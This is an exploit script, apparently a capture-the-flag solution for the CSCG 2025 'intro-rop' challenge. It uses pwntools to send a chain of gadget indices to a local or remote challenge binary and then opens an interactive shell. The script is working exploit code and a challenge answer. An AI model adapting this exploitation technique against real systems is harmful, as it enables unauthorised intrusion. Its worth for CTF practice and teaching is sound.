Files
ctf/2025/cscg/pwn/intro3/exploit.py
2025-06-06 03:13:31 +02:00

54 lines
1.3 KiB
Python

from pwn import *
# Set the context for the binary
context.binary = './intro-rop' # Replace with your binary's name
# Choose local or remote
LOCAL = True # Change to False if connecting remotely
if LOCAL:
p = process(context.binary.path)
else:
p = remote("3b45136b24d0eac2fc0ed87f-1024-intro-pwn-3.challenge.cscg.live", 1337, ssl=True)# Define functions for convenience
def send_payload(payload):
p.sendline(payload)
def recv_until(delim):
return p.recvuntil(delim)
def interact():
p.interactive()
#0x00000000: pop rax; ret
#0x00000001: add rbx, r9; ret
#0x00000002: mov rcx, qword ptr [rbx]; ret
#0x00000003: mov rax, r8; mov rbx, r9; mov rcx, r10; ret
#0x00000004: xor rcx, rdi; xor rbx, rdi; ret
#0x00000005: push rax; ret
#0x00000006: xor rax, rax; xor rsi, rsi; ret
#0x00000007: sub rax, 0x8; idiv rdi; ret
#0x00000008: add rdi, r8; ret
#0x00000009: nop; ret
#0x0000000a: imul rbx, rax; ret
#0x0000000b: xor r9, r8; xor r8, r9; xor r9, r8; ret
#0x0000000c: mov rcx, rsi; add rcx, r10; ret
#0x0000000d: xor rdi, rcx; xor rsi, rcx; ret
#0x0000000e: pop rbx; push rdi; push rbx; ret
#0x0000000f: pop rbp; pop rsi; ret
ropchain = [
b"3", b"2", b"6", b"13", b"12", b"-1"
]
print("Send ropchain")
input()
for gadget in ropchain:
recv_until(b'Enter gadget index: ')
send_payload(gadget)
interact() # Keep the shell open